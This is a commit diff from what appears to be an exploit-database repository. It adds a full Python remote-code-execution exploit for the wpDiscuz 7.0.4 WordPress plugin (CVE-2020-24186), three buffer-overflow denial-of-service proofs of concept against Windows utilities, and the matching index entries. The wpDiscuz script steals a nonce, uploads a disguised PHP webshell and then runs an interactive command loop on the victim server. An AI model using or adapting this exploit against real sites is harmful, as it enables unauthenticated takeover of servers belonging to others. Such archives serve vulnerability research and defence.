DB: 2021-06-09

4 changes to exploits/shellcodes NBMonitor 1.6.8 - Denial of Service (PoC) Nsauditor 3.2.3 - Denial of Service (PoC) Backup Key Recovery 2.2.7 - Denial of Service (PoC) WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)
2021-06-09 05:01:55 +00:00 · 2021-06-09 05:01:55 +00:00 · a32743b8b4
commit a32743b8b4
parent d6a44bd00b
5 changed files with 192 additions and 0 deletions
--- a/exploits/php/webapps/49967.py
+++ b/exploits/php/webapps/49967.py
@ -0,0 +1,126 @@
+# Exploit Title: WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)
+# Date: 2021/06/08
+# Exploit Author: Fellipe Oliveira
+# Vendor Homepage: https://gvectors.com/
+# Software Link: https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip
+# Version: wpDiscuz 7.0.4
+# Tested on: Debian9, Windows 7, Windows 10 (Wordpress 5.7.2)
+# CVE : CVE-2020-24186
+# Thanks for the great contribution to the code: Z3roC00l (https://twitter.com/zeroc00I)
+
+#!/bin/python3
+
+import requests
+import optparse
+import re
+import random
+import time
+import string
+import json
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://192.168.1.81/blog")
+parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /2021/06/blogpost")
+
+
+options, args = parser.parse_args()
+
+if not options.url or not options.path:
+    print('[+] Specify an url target')
+    print('[+] Example usage: exploit.py -u http://192.168.1.81/blog -p /wordpress/2021/06/blogpost')
+    print('[+] Example help usage: exploit.py -h')
+    exit()
+
+session = requests.Session()
+
+main_url = options.url
+path = options.path
+url_blog = main_url + path
+clean_host = main_url.replace('http://', '').replace('/wordpress','')
+
+def banner():
+    print('---------------------------------------------------------------')
+    print('[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution')
+    print('[-] File Upload Bypass Vulnerability - PHP Webshell Upload')
+    print('[-] CVE: CVE-2020-24186')
+    print('[-] https://github.com/hevox')
+    print('--------------------------------------------------------------- \n')
+
+def csrfRequest():
+    global wmuSec
+    global wc_post_id
+
+    try:
+        get_html = session.get(url_blog)
+        response_len = str(len(get_html.text))
+        response_code = str(get_html.status_code)
+        print('[+] Response length:['+response_len+'] | code:['+response_code+']')
+
+        raw_wmu = get_html.text.replace(',','\n')
+        wmuSec = re.findall('wmuSecurity.*$',raw_wmu,re.MULTILINE)[0].split('"')[2]
+        print('[!] Got wmuSecurity value: '+ wmuSec +'')
+        raw_postID = get_html.text.replace(',','\n')
+        wc_post_id = re.findall('wc_post_id.*$',raw_postID,re.MULTILINE)[0].split('"')[2]
+        print('[!] Got wmuSecurity value: '+ wc_post_id +' \n')
+
+    except requests.exceptions.ConnectionError as err:
+        print('\n[x] Failed to Connect in: '+url_blog+' ')
+        print('[x] This host seems to be Down')
+        exit()
+
+
+def nameRandom():
+    global shell_name 
+    print('[+] Generating random name for Webshell...')
+    shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15)))
+    time.sleep(1)  
+    print('[!] Generated webshell name: '+shell_name+'\n')
+
+    return shell_name
+
+
+def shell_upload():
+    global shell
+    print('[!] Trying to Upload Webshell..')
+    try:
+        upload_url = main_url + "/wp-admin/admin-ajax.php"
+        upload_cookies = {"wordpress_test_cookie": "WP%20Cookie%20check", "wpdiscuz_hide_bubble_hint": "1"}
+        upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------2032192841253859011643762941", "Origin": "http://"+clean_host+"", "Connection": "close", "Referer": url_blog}
+        upload_data = "-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nwmuUploadFiles\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmu_nonce\"\r\n\r\n"+wmuSec+"\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\r\n\r\n\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\""+shell_name+".php\"\r\nContent-Type: image/png\r\n\r\nGIF689a;\r\n\r\n<?php system($_GET['cmd']); ?>\r\n\x1a\x82\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"postId\"\r\n\r\n"+wc_post_id+"\r\n-----------------------------2032192841253859011643762941--\r\n"
+        check = session.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data)
+        json_object = (json.loads(check.text))
+        status = (json_object["success"])
+
+        get_path = (check.text.replace(',','\n'))
+        shell_pret = re.findall('url.*$',get_path,re.MULTILINE)
+        find_shell = str(shell_pret)
+        raw = (find_shell.replace('\\','').replace('url":"','').replace('\',','').replace('"','').replace('[\'',''))
+        shell = (raw.split(" ",1)[0])
+
+        if status == True:
+            print('[+] Upload Success... Webshell path:' +shell+' \n')
+        else:
+            print('[x] Failed to Upload Webshell in: '+ url_blog +' ')
+            exit()
+
+    except requests.exceptions.HTTPError as conn:
+        print('[x] Failed to Upload Webshell in: '+ url_blog +' ')
+
+    return shell
+
+
+def code_exec():
+    try:
+            while True:
+                cmd = input('> ')
+                codex = session.get(shell + '?cmd='+cmd+'')
+                print(codex.text.replace('GIF689a;','').replace('<EFBFBD>',''))
+    except:
+        print('\n[x] Failed to execute PHP code...')
+
+
+banner()
+csrfRequest()
+nameRandom()
+shell_upload()
+code_exec()
--- a/exploits/windows/dos/49964.py
+++ b/exploits/windows/dos/49964.py
@ -0,0 +1,20 @@
+# Exploit Title: NBMonitor 1.6.8 - Denial of Service (PoC)
+# Date: 07/06/2021
+# Author: Erick Galindo 
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
+# Version: 1.6.8
+# Tested on: Windows 10 Pro x64 es
+
+# Proof of Concept:
+#1.- Copy printed "AAAAA..." string to clipboard!
+#2.- Go to Register > Enter Registration Code...
+#3.- Write anything in 'Name' field
+#4.- Paste clipboard in 'Key' field
+#5.- Click on button -> Ok
+
+buffer = "\x41" * 256
+
+f = open ("NBM.txt", "w")
+f.write(buffer)
+f.close()
--- a/exploits/windows/dos/49965.py
+++ b/exploits/windows/dos/49965.py
@ -0,0 +1,21 @@
+# Exploit Title: Nsauditor 3.2.3 - Denial of Service (PoC)
+# Date: 07/06/2021
+# Author: Erick Galindo 
+# Vendor Homepage: http://www.nsauditor.com
+# Software http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Version: 3.2.3.0
+# Tested on: Windows 10 Pro x64 es
+
+# Proof of Concept:
+#1.- Copy printed "AAAAA..." string to clipboard!
+#2.- Open Nsauditor.exe
+#3.- Go to Register > Enter Registration Code...
+#4.- Write anything in 'Name' field
+#5.- Paste clipboard in 'Key' field
+#6.- Click on button -> Ok
+
+buffer = "\x41" * 256
+
+f = open ("NBM.txt", "w")
+f.write(buffer)
+f.close()
--- a/exploits/windows/local/49966.py
+++ b/exploits/windows/local/49966.py
@ -0,0 +1,21 @@
+# Exploit Title: Backup Key Recovery 2.2.7 - Denial of Service (PoC)
+# Date: 07/06/2021
+# Author: Erick Galindo 
+# Vendor Homepage: http://www.nsauditor.com
+# Software http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
+# Version: 2.2.7.0
+# Tested on: Windows 10 Pro x64 es
+
+# Proof of Concept:
+#1.- Copy printed "AAAAA..." string to clipboard!
+#2.- Open BackupKeyRecovery.exe
+#3.- Go to Register > Enter Registration Code...
+#4.- Write anything in 'Name' field
+#5.- Paste clipboard in 'Key' field
+#6.- Click on button -> Ok
+
+buffer = "\x41" * 256
+
+f = open ("poc.txt", "w")
+f.write(buffer)
+f.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6794,6 +6794,8 @@ id,file,description,date,author,type,platform,port
 49953,exploits/ios/dos/49953.py,"Macaron Notes great notebook 5.5 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
 49954,exploits/ios/dos/49954.py,"My Notes Safe 5.3 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
 49957,exploits/ios/dos/49957.py,"Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)",2021-06-07,"Geovanni Ruiz",dos,ios,
+49964,exploits/windows/dos/49964.py,"NBMonitor 1.6.8 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",dos,windows,
+49965,exploits/windows/dos/49965.py,"Nsauditor 3.2.3 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -11352,6 +11354,7 @@ id,file,description,date,author,type,platform,port
 49925,exploits/windows/local/49925.txt,"Veyon 4.4.1 - 'VeyonService' Unquoted Service Path",2021-06-01,"Víctor García",local,windows,
 49929,exploits/windows/local/49929.txt,"Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path",2021-06-02,"Geovanni Ruiz",local,windows,
 49959,exploits/windows/local/49959.py,"IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP",2021-06-07,"Austin Babcock",local,windows,
+49966,exploits/windows/local/49966.py,"Backup Key Recovery 2.2.7 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -44120,3 +44123,4 @@ id,file,description,date,author,type,platform,port
 49960,exploits/linux/webapps/49960.py,"Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated)",2021-06-07,enox,webapps,linux,
 49961,exploits/php/webapps/49961.py,"Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated)",2021-06-07,enox,webapps,php,
 49962,exploits/php/webapps/49962.sh,"Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)",2021-06-07,UnD3sc0n0c1d0,webapps,php,
+49967,exploits/php/webapps/49967.py,"WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)",2021-06-08,"Fellipe Oliveira",webapps,php,